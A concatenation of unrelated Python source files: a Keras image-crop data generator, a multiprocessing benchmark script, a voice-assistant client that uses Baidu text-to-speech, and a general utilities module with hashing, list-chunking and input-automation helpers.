If 'standard' we take the standard 10 crops (corners +center + mirrors)
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
"""
self.inputs = inputs
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.crop_number = crop_number
self.crop_mode = crop_mode
self.filemode = filemode
self.im_size = im_size
def __len__(self):
return len(self.inputs)
def __getitem__(self, idx):
batch_X = []
im = load_image(self.inputs[idx], filemode=self.filemode)
if self.crop_mode == 'random':
for _ in range(self.crop_number):
if self.aug_params:
im_aug = augment(im, params=self.aug_params)
else:
im_aug = np.copy(im)
im_aug = resize_im(im_aug, height=self.im_size, width=self.im_size)
batch_X.append(im_aug) # shape (N, 224, 224, 3)
if self.crop_mode == 'standard':
batch_X = standard_tencrop_batch(im)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
return batch_X
class k_crop_data_sequence_lo(Sequence):
"""
Data sequence generator for test time to feed to predict_generator.
Each batch delivered is composed by multiple crops (default=10) of the same image.
"""
def __init__(self, inputs,locations, num_locations,mean_RGB, std_RGB, preprocess_mode, aug_params, crop_number=10, crop_mode='random',
filemode='local', im_size=224):
"""
Parameters are the same as in the data_generator function except for:
Parameters
----------
crop_number : int
Number of crops of each image to take.
locations: list of location tags
num_locations: number of different locations
mode :str, {'random', 'standard'}
If 'random' data augmentation is performed randomly.
If 'standard' we take the standard 10 crops (corners +center + mirrors)
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
"""
self.inputs = inputs
self.locations = locations
self.num_locations = num_locations
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.crop_number = crop_number
self.crop_mode = crop_mode
self.filemode = filemode
self.im_size = im_size
def __len__(self):
return len(self.inputs)
def __getitem__(self, idx):
batch_X = []
im = load_image(self.inputs[idx], filemode=self.filemode)
if self.crop_mode == 'random':
for _ in range(self.crop_number):
if self.aug_params:
im_aug = augment(im, params=self.aug_params)
else:
im_aug = np.copy(im)
im_aug = resize_im(im_aug, height=self.im_size, width=self.im_size)
batch_X.append(im_aug) # shape (N, 224, 224, 3)
if self.crop_mode == 'standard':
batch_X = standard_tencrop_batch(im)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
nuevo_batch = []
for i in range(self.crop_number):
nuevo_batch.append(self.locations[idx])
batch_locations = to_categorical(nuevo_batch, num_classes=self.num_locations)
return [batch_X,batch_locations]
#return batch_X
def im_stats(filename):
"""
Helper for function compute_meanRGB
"""
im = load_image(filename, filemode='local')
mean = np.mean(im, axis=(0, 1))
std = np.std(im, axis=(0, 1))
return mean.tolist(), std.tolist()
def compute_meanRGB(im_list, verbose=False, workers=4):
"""
Returns the mean and std RGB values for the whole dataset.
For example in the plantnet dataset we have:
mean_RGB = np.array([ 107.59348955, 112.1047813 , 80.9982362 ])
std_RGB = np.array([ 52.78326119, 50.56163087, 50.86486131])
Parameters
----------
im_list : array of strings
Array where the first column is image_path (or image_url). Shape (N,).
verbose : bool
Show progress bar
workers: int
Numbers of parallel workers to perform the computation with.
References
----------
https://stackoverflow.com/questions/41920124/multiprocessing-use-tqdm-to-display-a-progress-bar
"""
print('Computing mean RGB pixel with {} workers...'.format(workers))
with Pool(workers) as p:
r = list(tqdm(p.imap(im_stats, im_list),
total=len(im_list),
disable=verbose))
r = np.asarray(r)
mean, std = r[:, 0], r[:, 1]
mean, std = np.mean(mean, axis=0), np.mean(std, axis=0)
print('Mean RGB pixel: {}'.format(mean.tolist()))
print('Standard deviation of RGB pixel: {}'.format(std.tolist()))
return mean.tolist(), std.tolist()
def compute_classweights(labels, max_dim=None, mode='balanced'):
"""
Compute the class weights for a set of labels to account for label imbalance.
Parameters
----------
labels : numpy array, type (ints), shape (N)
max_dim : int
Maximum number of classes. Default is the max value in labels.
mode : str, {'balanced', 'log'}
Returns
-------
Numpy array, type (float32), shape (N)
"""
if mode is None:
return None
weights = np.bincount(labels)
weights = np.sum(weights) / weights
# Fill the count if some high number labels are not present in the sample
if max_dim is not None:
diff = max_dim - len(weights)
if diff != 0:
weights = np.pad(weights, pad_width=(0, diff), mode='constant', constant_values=0)
# Transform according to different modes
if mode == 'balanced':
pass
elif mode == 'log':
# do not use --> produces numerical instabilities at inference when transferring weights trained on GPU to CPU
weights = np.log(weights) # + 1
else:
raise ValueError('{} is not a valid option for parameter "mode"'.format(mode))
return weights.astype(np.float32)
def json_friendly(d):
"""
Return a json friendly dictionary (mainly remove numpy data types)
"""
new_d = {}
for k, v in d.items():
if isinstance(v, (np.float32, np.float64)):
v = float(v)
elif isinstance(v, (np.ndarray, list)):
if isinstance(v[0], (np.float32, np.float64)):
v = np.array(v).astype(float).tolist()
else:
v = np.array(v).tolist()
new_d[k] = v
return new_d
|
Parallel_methods.py
|
#!/usr/bin/python
import multiprocessing as mp
import numpy as np
import time
data = ""
list_method = ["no", "starmap", "parallel"]
def main_script():
global min_check
global max_check
if __name__ == '__main__':
restart = ""
method = ""
method_chosen = False
threads_num = "0"
calc_num = "0"
min_check = -1
max_check = 11
print("\n\"no\" for no parallelization, \"starmap\" for pool.starmap_async(), \"parallel\" for parallel.")
while not method_chosen:
method = input("Which method would you like to try? ")
for i in range(len(list_method)):
if method == list_method[i]:
method_chosen = True
if method.lower() != "no" and method.lower() != "parallel":
while not threads_num.isdigit() or mp.cpu_count() < int(threads_num) or int(threads_num) <= 0:
threads_num = input(
f"\nType in the number of CPU threads you would like to use ({mp.cpu_count()} threads available): ")
threads_num = int(threads_num)
while not calc_num.isdigit() or not int(calc_num) > 0:
calc_num = input("\nType in the number of calculcations to be made: ")
calc_num = int(calc_num)
set_range()
if __name__ == '__main__':
global data
if method.lower() != "no" and method.lower() != "parallel":
pool = mp.Pool(threads_num)
print("\nCPU thread pool defined! (" + str(threads_num) + ")")
# Without multiprocessing/parallelization
if method.lower() == "no":
print("\nWorking...")
time_started = time.time()
for i in range(calc_num):
prepare_data()
results = []
for row in data:
results.append(count_within_range(row, min=min_check, max=max_check))
print("RESULTS #" + str(i + 1) + ": " + str(results[:10]))
# mp.Process - parallelization
if method.lower() == "parallel":
results = mp.Manager().list()
if calc_num >= 6:
calc_curr = 6
else:
calc_curr = calc_num
print("\nWorking...")
time_started = time.time()
while calc_num > 0:
processes = []
if calc_curr > calc_num:
calc_curr = calc_num
for i in range(calc_curr):
p = mp.Process(target=count_within_range_parallel, args=[results, min_check, max_check])
p.start()
processes.append(p)
calc_num -= 1
for process in processes:
process.join()
results = [results[x:x + 10] for x in range(0, len(results), 10)]
for j in range(len(results)):
print("RESULTS #" + str(j + 1) + ": " + str(results[j]))
# pool.starmap_async()
if method.lower() == "starmap":
print("\nWorking...")
time_started = time.time()
for i in range(calc_num):
prepare_data()
results = pool.starmap_async(count_within_range, [(row, 2, 8, i) for i, row in enumerate(data)]).get()
print("RESULTS #" + str(i + 1) + ": " + str(results[:10]))
pool.close()
# pool.map()
'''if method.lower() == "map":
print("Working...")
results = pool.map(count_within_range, [row for row in data])
pool.close()
print("RESULTS #" + str(results_num) + ": " + str(results[:10]))
results_num += 1'''
# pool.apply()
'''if method.lower() == "apply":
for i in range(calc_num):
print("Working...")
results = [pool.apply(count_within_range, args=(row, 2, 8)) for row in data]
print("RESULTS #" + str(results_num) + ": " + str(results[:10]))
results_num += 1
pool.close()'''
time_ended = time.time()
print("------------------------------------------------")
print("Time taken to calculate data: " + "%.2f" % (time_ended - time_started) + " seconds.")
while restart.lower() != "y" and restart.lower() != "n":
restart = input("\nRestart script y/(n)? ")
if restart.lower() == "y":
print("\nRestarting...")
main_script()
else:
quit()
# --------------------------------------END OF CALCULATIONS-----------------------------------------
def prepare_data():
global data
np.random.RandomState(100)
arr = np.random.randint(0, 10, size=[200000, 5])
data = arr.tolist()
def count_within_range(row, min=2, max=8, i=None):
count = 0
for n in row:
if min <= n <= max:
count = count + 1
return count
def count_within_range_parallel(results, min=2, max=8):
global data
prepare_data()
loops = 0
for row in data:
loops += 1
count = 0
for n in row:
if int(min) <= n <= int(max):
count = count + 1
results.append(count)
if loops == 10:
break
def set_range():
print("\nNow, set the range to check how many numbers lie in it. (... in range(2, 8)) ")
print("Allowed range is from 0 to 10.")
print("Maximum number has to be higher than minimum number or equal to it!")
def set_numbers():
global min_check
global max_check
while int(min_check) < 0 or int(min_check) > 9:
min_check = input("\nChoose the minimum number, leave empty for default (default=2): ")
if str(min_check).isspace() or not str(min_check):
min_check = 2
elif not str(min_check).isnumeric():
min_check = -1
while (int(max_check) > 10 or int(max_check) < 1) or int(max_check) < int(min_check):
print("\nChoose the maximum number, leave empty for default (default=8).")
max_check = input("Type \"min\" to change minimum number: ")
if str(max_check).lower() == "min":
set_numbers()
elif not str(max_check) or str(max_check).isspace():
max_check = 8
elif str(max_check) != "min" and not str(max_check).isnumeric():
max_check = 11
set_numbers()
main_script()
|
detect.py
|
# detect.py
import os
import base64
import json
import pyaudio
import pygame
import requests
import wave
import time
import datetime
import numpy as np
from pocketsphinx import LiveSpeech
from multiprocessing import Process
import psutil
CHUNK = 1024 # 每个缓冲区的帧数
FORMAT = pyaudio.paInt16 # 采样位数
CHANNELS = 1 # 单声道
RATE = 16000 # 采样频率
API_KEY = '' # 请到百度申请
SECRET_KEY = '' # 请到百度申请
# 获取TOKEN地址
TOKEN_URL = 'http://openapi.baidu.com/oauth/2.0/token'
# 文字转语音地址
T2V_URL = 'https://tsn.baidu.com/text2audio'
# 文字转语音地址
T2V_URL = 'https://tsn.baidu.com/text2audio'
# Conversation 语音对话地址
CON_URL = 'http://127.0.0.1:5000/conversation'
# Text Conversation 文字对话地址
T_CON_URL = 'http://127.0.0.1:5000/text_conversation'
# 公交车提醒地址
BUS_ALARM_URL = 'http://192.168.43.145:9090/bus/get_audio/text'
def record_audio(wave_out_path, max_record_second):
""" 录音功能 """
p = pyaudio.PyAudio() # 实例化对象
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK) # 打开流,传入响应参数
less = []
frames = []
for i in range(0, int(RATE / CHUNK * max_record_second)): # 最长录制时间(秒)
print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')+" recording")
data = stream.read(CHUNK)
frames.append(data)
# 检查音量是否大于阈值
volume = np.max(np.fromstring(data, dtype=np.short))
if volume < 1500:
less.append(-1)
print("below threshold, counting: ", less)
# 如果有连续15个循环的点,都不是声音信号,就认为音频结束了
if len(less) == 5:
break
else:
less = []
stream.stop_stream() # 关闭流
stream.close()
p.terminate()
print('over')
# 保存为wav文件
wf = wave.open(wave_out_path, 'wb') # 打开 wav 文件。
wf.setnchannels(CHANNELS) # 声道设置
wf.setsampwidth(p.get_sample_size(FORMAT)) # 采样位数设置
wf.setframerate(RATE) # 采样频率设置
wf.writeframes(b''.join(frames))
wf.close()
print('writen')
# def play_audio(wave_input_path):
# p = pyaudio.PyAudio() # 实例化
# wf = wave.open(wave_input_path, 'rb') # 读 wav 文件
# stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
# channels=wf.getnchannels(),
# rate=wf.getframerate(),
# output=True)
# data = wf.readframes(CHUNK) # 读数据
# while len(data) > 0:
# stream.write(data)
# data = wf.readframes(CHUNK)
#
# stream.stop_stream() # 关闭资源
# stream.close()
# p.terminate()
# 准备发送语音
def prepare_params(voice_file):
# 读取文件二进制内容
f_obj = open(voice_file, 'rb')
content = base64.b64encode(f_obj.read()) # 转base64编码格式
speech = content.decode("utf-8")
size = os.path.getsize(voice_file)
# json封装
data = json.dumps({
'speech': speech,
'len': size
})
return data
def fetch_token():
params = {'grant_type': 'client_credentials',
'client_id': API_KEY,
'client_secret': SECRET_KEY}
resp = requests.post(TOKEN_URL, params)
# print(resp.text)
result = json.loads(resp.text)
# print(result)
if 'access_token' in result.keys():
return result['access_token']
else:
print('MAYBE API_KEY or SECRET_KEY not correct: access_token or scope not found in token response')
# 文字转语音
def text2mp3(text):
token = fetch_token()
length = len(text)
if length == 0:
text = '什么?'
text = requests.utils.quote(text)
params = {'tex': text,
'tok': token,
'cuid': '1111',
'ctp': 1,
'lan': 'zh',
'spd': 5,
'pit': 5,
'vol': 5,
'per': 4
}
header = {
'Content-Type': 'application/x-www-form-urlencoded'
}
# print post_data
res = requests.post(T2V_URL, data=params, headers=header)
if not isinstance(res, dict):
with open('music/text2voice.mp3', 'wb') as f:
for chunk in res.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
return 'music/text2voice.mp3'
# 发送声音到云端
def send_voice(voice_file):
# 读取文件二进制内容
f_obj = open(voice_file, 'rb')
content = base64.b64encode(f_obj.read()) # 转base64编码格式
speech = content.decode("utf-8")
size = os.path.getsize(voice_file)
# json封装
params = json.dumps({
'speech': speech,
'len': size
})
# 发送请求
resp = requests.post(CON_URL, data=params)
# 返回结果
return resp.text
def play_mp3(file):
pygame.mixer.pre_init(16000, -16, 2, 2048)
pygame.mixer.init()
pygame.mixer.music.load(file)
pygame.mixer.music.play(loops=0, start=0.0)
while pygame.mixer.music.get_busy():
time.sleep(1)
pygame.mixer.music.unload()
# 根据硬件客户端sno查询闹钟事件
def alarm():
#查询事件
# json封装
# params = json.dumps({'text_in': '我的公交车还有多久到'})
# 发送请求
resp = requests.get(BUS_ALARM_URL)
# 返回结果
return resp.text
# 闹钟
def alarm_timer():
loop = 0
while True:
cur_time = list(time.localtime())
loop = loop + 1
print('alarm-is-working:'+str(loop))
# if cur_time[3] == 22 and cur_time[4] >= 30 and cur_time[4] <= 50: # compare alarm setting time
# rs = alarm('bmango')
# print(rs)
# play_mp3(text2mp3(rs))
alarm_rs = alarm()
if alarm_rs != '':
alarm_mp3 = text2mp3(alarm_rs)
play_mp3(alarm_mp3)
time.sleep(30)
if __name__ == "__main__":
# Start alarm
ala = Process(target=alarm_timer, args=())
ala.start()
print('start a process.')
pause = psutil.Process(ala.pid)
# Start LiveSpeech
speech = LiveSpeech(lm=False, keyphrase='mango', kws_threshold=1e-20)
for phrase in speech:
# 替换唤醒词,防止被重复唤醒
speech = ''
# 停止闹钟
if pause.status() == 'running':
pause.suspend()
print(pause.status())
# 快速回应
print("user:", phrase)
print("speaker:来了")
play_mp3("music/nishuoba.mp3")
# 人类反应时间
# time.sleep(0.3)
# 记录提问语音
record_audio("music/comm.wav", 5)
# 获取答案,转换为语音
answer_text = send_voice("music/comm.wav")
answer_mp3 = text2mp3(answer_text)
# 播放答案语音
play_mp3(answer_mp3)
# time.sleep(2)
# 恢复唤醒词
speech = LiveSpeech(lm=False, keyphrase='mango', kws_threshold=1e-20)
# 继续闹钟
if pause.status() == "stopped":
pause.resume()
|
__init__.py
|
import hashlib
import platform as _platform_module
import os
from copy import copy, deepcopy
from contextlib import _RedirectStream, suppress
from functools import wraps
from io import StringIO
from threading import Thread
from typing import BinaryIO, Callable, Generator, Iterable, List, Tuple, TypeVar
is_being_run_from_explorer = None
with suppress(ImportError):
import ctypes
kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
is_being_run_from_explorer = kernel32.GetConsoleProcessList((ctypes.c_uint * 1)(), 1) <= 2
from colorama import Fore
with suppress(ImportError):
import win10toast
_toaster = win10toast.ToastNotifier()
T = TypeVar('T')
_platform = _platform_module.system().lower()
class PlatformError(Exception):
pass
def requires_platform(platform: str):
"""A decorator that raises an error if a function is run on an
unsupported platform.
Args:
platform (str): The platform name. This can be found with
`platform.system()`. Case is irrelevant.
Raises:
PlatformError: If the running platform does not match the one
dictated in the decorator. This is raised when the decorated
function is run.
Examples:
# if using windows
>>> @requires_platform('windows')
... def f():
... print('Hello, World!')
>>> f()
Hello, World!
>>> @requires_platform('linux')
... def f():
... print('Hello, World!')
>>> f()
Traceback (most recent call last):
...
PlatformError: this operation requires platform 'linux'
"""
platform = platform.lower()
def wrapper(func):
@wraps(func)
def wrapped(*args, **kwargs):
if not platform == _platform:
raise PlatformError(f'this operation requires platform {platform!r}')
func(*args, **kwargs)
return wrapped
return wrapper
def pluralize(word: str, n: int, plural: str = 's', append: bool = True) -> str:
"""Pluralize a word.
Args:
word (str): The word to pluralize. `str` is called on this.
n (int): The number that decides if the word should be plural
or not. If this number is 1, the word will not be
pluralized, otherwise it will be.
plural (:obj:`str`, optional): If `append` is True, this string
will be appended to the word if it should be pluralized. If
`append` is false, this string will be returned if the word
should be pluralized. Defaults to 's'.
append (:obj:`bool`, optional): Whether `plural` should be
appended to the word (True) or returned in place of the word
(False). Defaults to True
Returns:
str: The plural of `word` if `n` is not 1. Otherwise return
`word`. If `append` is True, return `word + plural`,
otherwise return `plural`.
Examples:
>>> pluralize('duck', 2)
'ducks'
>>> pluralize('egg', 1)
'egg'
>>> pluralize('cactus', 5, 'cacti', False)
'cacti'
"""
if n == 1:
return str(word)
else:
if append:
return str(word) + plural
else:
return plural
def run_in_background(func: Callable):
"""Run `func` in a thread, letting it finish on its own."""
@wraps(func)
def wrapped(*args, **kwargs):
Thread(target=func, args=args, kwargs=kwargs).start()
return wrapped
@requires_platform('windows')
@run_in_background
def notify(title: str, message: str = ' ', duration: int = 5, icon: os.PathLike = None):
"""Send a windows (only) notification.
Args:
title (str): The title of the notification.
message (:obj:`str`, optional): The message of the
notification.
duration (:obj:`int`, optional): The time (in seconds) for the
notification the show. Defaults to 5.
icon (:obj:`str`, optional): The path of the icon to use. No
icon will be displayed if this is None. Defaults to None.
"""
_toaster.show_toast(title, message, icon, duration)
class Label:
"""A colored label.
`colorama.init()` needs to be called for colors to work on windows.
Colors should be selected from `colorama.Fore`. Default arguments
for the label can be set when the label is instantiated (and are
stored by the same name as attributes). When called, all attributes
can be overwritten as keyword-only arguments, except for `message`,
which is positional.
Args / Attributes:
label (str): The label.
label_color (:obj:`str`, optional): The color of the label, this
should be an ANSI color code. Defaults to `RESET`.
message (:obj:`str`, optional): The message. Defaults to None.
message_color (:obj:`str`, optional): The color of the message,
this should be an ANSI color code. Defaults to `RESET`.
encasing (:obj:`tuple[str]`, optional): A tuple of two strings.
This is whats printed on either side of the label. Defaults
to ('[', ']').
encasing_color (:obj:`str`, optional): The color of the
encasing, this should be an ANSI color code. Defaults to
`RESET`.
pre (:obj:`str`, optional): The string to be printed before the
first encasing. Defaults to an empty string.
end (:obj:`str`, optional): The string to be printed after the
message. Defaults to '\n'.
Examples:
>>> import colorama
>>> from platform import system
>>> from colorama import Fore
>>> if system() == 'Windows':
... colorama.init()
>>> class Labels:
... error = Label('Error', Fore.LIGHTRED_EX)
... success = Label('Success', Fore.LIGHTGREEN_EX)
>>> Labels.error('error message with red label')
[Error] error message with red label
>>> Labels.success('success message with green label')
[Success] success message with green label
>>> Labels.error('message', label='Label Overwrite')
[Label Overwrite] message
>>> Labels.success.encasing = ('(', ')')
>>> Labels.success('success message with green label in parens')
(Success) success message with green label in parens
"""
def __init__(self, label: str, label_color=Fore.RESET, message: str = None,
message_color=Fore.WHITE, *, encasing: Tuple[str, str] = ('[', ']'),
encasing_color=Fore.WHITE, pre: str = '', end: str = '\n'):
self.label = label
self.label_color = label_color
self.message = message
self.message_color = message_color
self.encasing = encasing
self.encasing_color = encasing_color
self.pre = pre
self.end = end
def __repr__(self):
return ((f'Label(label={self.label!r}), label_color={self.label_color!r}, '
f'message={self.message!r}, message_color={self.message_color!r}, '
f'encasing=({self.encasing!r}), encasing_color={self.encasing_color!r}, '
f'pre={self.pre!r}, end={self.end!r}'))
def __len__(self):
message = '' if self.message is None else self.message
return sum((1, *map(len, self.label, self.encasing[0], self.encasing[1], message)))
def __call__(self, message: str = None, *, label: str = None, label_color=None, message_color=None,
encasing: tuple = None, encasing_color=None, pre: str = None, end: str = None):
if message is None:
if self.message is None:
message = ''
else:
message = self.message
if label is None:
label = self.label
if label_color is None:
label_color = self.label_color
if message_color is None:
message_color = self.message_color
if encasing is None:
encasing = self.encasing
if encasing_color is None:
encasing_color = self.encasing_color
if pre is None:
pre = self.pre
if end is None:
end = self.end
print(''.join((pre, encasing_color, encasing[0], label_color, label, Fore.RESET,
encasing_color, encasing[1], ' ', message_color, message, Fore.RESET)),
end=end)
class AutoInput(_RedirectStream):
"""A context manager to write to stdin with (to automate `input()`).
Args:
*args (str): The strings to use as inputs (in the order to be
used).
Example:
>>> with AutoInput('hello', 'goodbye') as ai:
... ai.add('eggs', 'spam')
... print(input(), input(), input(), input())
...
hello goodbye eggs spam
"""
def __init__(self, *args: str):
super().__init__(StringIO())
self._stream = 'stdin'
self.add(*args)
def add(self, *args: str):
location = self._new_target.tell()
# Go to the end of the stream.
for _ in self._new_target.readlines():
pass
self._new_target.write('\n'.join(args) + '\n')
self._new_target.seek(location)
def __enter__(self):
super().__enter__()
return self
def auto_input_decorator(*inputs: str):
"""Use `AutoInput` as a decorator. Primarily for debugging.
Args:
*inputs (str): The strings to use as inputs (in the order to be
used).
Example:
>>> @auto_input_decorator('hello', 'goodbye')
... def func(a):
... print(input())
... print(a)
... print(input())
>>> func('eggs')
hello
eggs
goodbye
"""
def wrapper(func):
@wraps(func)
def wrapped(*args, **kwargs):
with AutoInput(*inputs):
return func(*args, **kwargs)
return wrapped
return wrapper
def hash_file(f: BinaryIO, algorithm: Callable = hashlib.blake2b, block_size: int = 65536) -> bytes:
"""Get the digest of the hash of a file.
Args:
f (BinaryIO): Readable binary file-like object to hash.
algorithm (:obj:`object`, optional): The hash algorithm object
to use. This should have an `update` method. Defaults to
`hashlib.blake2b`.
block_size (:obj:`int`, optional): The amount of bytes to read
into memory at once. This should be a multiple of the hash
algorithm's block size. Defaults to 65536.
Returns:
bytes: The digest of the hash.
"""
hash_ = algorithm()
while True:
buf = f.read(block_size)
if not buf:
break
hash_.update(buf)
return hash_.digest()
def hash_file_hex(f: BinaryIO, algorithm: Callable = hashlib.blake2b, block_size: int = 65536) -> str:
"""Get the hex digest of the hash of a file.
Args:
f (os.pathlike, str): Readable binary file-like object to hash.
algorithm (:obj:`object`, optional): The hash algorithm object
to use. This should have an `update` method. Defaults to
`hashlib.blake2b`.
block_size (:obj:`int`, optional): The amount of bytes to read
into memory at once. This should be a multiple of the hash
algorithm's block size. Defaults to 65536.
Returns:
str: The hex digest of the hash.
"""
hash_ = algorithm()
while True:
buf = f.read(block_size)
if not buf:
break
hash_.update(buf)
return hash_.hexdigest()
def iter_all_files(path: os.PathLike, on_error: Callable = None,
follow_links: bool = False) -> Generator[str, None, None]:
"""Iterate over all files and subfiles in a directory.
Note that directories will not be yielded.
Args:
path (os.PathLike): The path to iterate over.
on_error (:obj:`Callable`, optional): A function that will be
called in the event of an error. It will be called with one
argument--an `OSError` instance. It can raise an error to
abort the walk or not raise an error and continue.
follow_links (:obj:`bool`, optional): Whether or not to follow
symlinks. Defaults to `False`.
Yields:
str: The path of the file at this step of the iteration.
"""
path_join = os.path.join
for root, _, files in os.walk(path, onerror=on_error, followlinks=follow_links):
for file in files:
yield path_join(root, file)
def chunk_list_inplace(lst: List[T], size: int) -> List[List[T]]:
"""Split a list into chunks (in place).
If the list doesn't divide equally, all excess items are appended to
the end of the output list. To drop the excess items, use
`chunk_list_inplace_drop_excess`.
For performance reasons, this function modifies the original list.
To not modify the original list, use `chunk_list`.
Args:
lst (list): The list to chunk.
size (int): The size of chunks to make.
Examples:
>>> chunk_list_inplace([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 2)
[[1, 2], [3, 4], [5, 6], [7, 8], [9, 10]]
>>> chunk_list_inplace([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3)
[[1, 2, 3], [4, 5, 6], [7, 8, 9], [10]]
>>> chunk_list_inplace([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 4)
[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10]]
"""
out = []
while lst:
out.append(lst[:size])
del lst[:size]
return out
def chunk_list_inplace_drop_excess(lst: List[T], size: int) -> List[List[T]]:
"""Split a list into chunks (in place).
If the list doesn't divide equally, all excess items are dropped. To
keep the excess items, use `chunk_list_inplace`.
For performance reasons, this function modifies the original list.
To not modify the original list, use `chunk_list_drop_excess`.
Args:
lst (list): The list to chunk.
size (int): The size of chunks to make.
Examples:
>>> chunk_list_inplace_drop_excess(
... [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 2)
[[1, 2], [3, 4], [5, 6], [7, 8], [9, 10]]
>>> chunk_list_inplace_drop_excess(
... [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3)
[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
>>> chunk_list_inplace_drop_excess(
... [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 4)
[[1, 2, 3, 4], [5, 6, 7, 8]]
"""
out = chunk_list(lst, size)
if not len(out[-1]) == size:
out.pop()
return out
def chunk_list(lst: List[T], size: int) -> List[List[T]]:
"""Split a list into chunks.
If the list doesn't divide equally, all excess items are appended to
the end of the output list. To drop the excess items, use
`chunk_list_drop_excess`.
If the original list is not used after this function is run (and can
safely be modified), use `chunk_list_inplace` for performance
reasons.
Args:
lst (list): The list to chunk.
size (int): The size of chunks to make.
Examples:
>>> chunk_list([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 2)
[[1, 2], [3, 4], [5, 6], [7, 8], [9, 10]]
>>> chunk_list([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3)
[[1, 2, 3], [4, 5, 6], [7, 8, 9], [10]]
>>> chunk_list([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 4)
[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10]]
"""
return chunk_list_inplace(list(lst), size)
def chunk_list_drop_excess(lst: List[T], size: int) -> List[List[T]]:
"""Split a list into chunks.
If the list doesn't divide equally, all excess items are dropped. To
keep the excess items, use `chunk_list`.
If the original list is not used after this function is run (and can
safely be modified), use `chunk_list_inplace_drop_excess` for
performance reasons.
Args:
lst (list): The list to chunk.
size (int): The size of chunks to make.
Examples:
>>> chunk_list_drop_excess([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 2)
[[1, 2], [3, 4], [5, 6], [7, 8], [9, 10]]
>>> chunk_list_drop_excess([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3)
[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
>>> chunk_list_drop_excess([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 4)
[[1, 2, 3, 4], [5, 6, 7, 8]]
"""
return chunk_list_inplace_drop_excess(list(lst), size)
def get_expanded_str(string: str, lst: List[str], key: Callable[[str], str] = lambda x: x):
"""Get the first string of a list that starts with the most
characters of a given string.
If the string is empty, return the first item of the list. If the
list is empty as well, raise a `ValueError`. A `ValueError` will be
raised if the string is not in the list.
Args:
string (str): The string (or string-like object) to find
characters in common with.
lst (List[str]): The list of strings to test against. This list
should contain `str`s or string-like objects.
key (:obj:`Callable`, optional): This is called on each item of
`lst` to get the string to use for that item's score. Should
return a `str` or string-like object.
Raises:
ValueError: If no item of the list has any beginning characters
in common with the string.
Examples:
>>> get_expanded_str('ro', ['rock', 'paper', 'scissors'])
'rock'
>>> get_expanded_str('', ['rock', 'paper', 'scissors'])
'rock'
>>> get_expanded_str('rock', ['rock', 'paper', 'scissors'])
'rock'
>>> get_expanded_str('egg', ['rock', 'paper', 'scissors'])
Traceback (most recent call last):
...
ValueError: string 'egg' not in list
>>> class Human:
... def __init__(self, name: str):
... self.name = name
... def __repr__(self):
... return f'Human(name={self.name!r})'
>>> humans = [Human('joe'), Human('liam'), Human('bob')]
>>> get_expanded_str('li', humans, key=lambda x: x.name)
Human(name='liam')
"""
if lst:
if not string:
return lst[0]
else:
raise ValueError(f'string {string!r} not in list')
scores = {i: 0 for i in lst}
for original in lst:
i = key(original)
if i == string:
return i
score = 0
with suppress(IndexError):
for n, char in enumerate(i):
if not char == string[n]:
break
score += 1
scores[original] = score
guess = max(scores.items(), key=lambda i: i[1])
if len(key(guess[0])) < len(string) or guess[1] == 0:
raise ValueError(f'string {string!r} not in list')
return guess[0]
def memoize_from_attrs(attrs_iter: Iterable[str], *attrs: str):
"""Memoize a method based of the object's attributes.
This is a decorator. Cache the return value of a method and bind the
cached value to the current values of `attrs`. If all `attrs` of
the object are the same as a previous time the method was run, use
the cached value. The method will only ever be run one time for each
unique combination of attribute values.
Args:
*attrs (str): The attributes to check. If the first argument is
not an `str`, it's contents will be used as arguments.
Examples:
>>> class C:
... def __init__(self):
... self.a = 5
... @memoize_from_attrs('a')
... def method(self):
... print('ran C.method()')
... return self.a + 3
...
>>> c=C()
>>> c.method()
ran C.method()
8
>>> c.method()
8
>>> c.a = 10
>>> c.method()
ran C.method()
13
>>> c.a = 5
>>> c.method()
8
"""
if isinstance(attrs_iter, str):
attrs = tuple(*attrs_iter, *attrs)
else:
attrs = tuple(attrs_iter, *attrs)
def wrapper(func):
@wraps(func)
def wrapped(obj, *args, **kwargs):
obj_attrs = tuple(getattr(obj, attr) for attr in attrs)
try:
return obj.__attr_memoize[obj_attrs]
except KeyError:
pass
except AttributeError:
obj.__attr_memoize = {}
result = func(obj, *args, **kwargs)
obj.__attr_memoize[obj_attrs] = result
return result
return wrapped
return wrapper
def gen_run(*funcs: Callable[[], T]) -> Generator[T, None, None]:
"""Run a list of callables as iterated over.
Passing keyword arguments to the functions is not supported--use
lambdas instead. To call every callable when the function is run,
use `run`.
Args:
*funcs: The objects to call.
Yields:
The output of the callables.
Examples:
>>> def f(a):
... print('ran f')
... return a + 5
>>> for i in gen_run(lambda: f(1), lambda: f(2)):
... print(i)
ran f
6
ran f
7
"""
for func in funcs:
yield func()
def run(*funcs: Callable[[], T]) -> List[T]:
"""Run a list of callables.
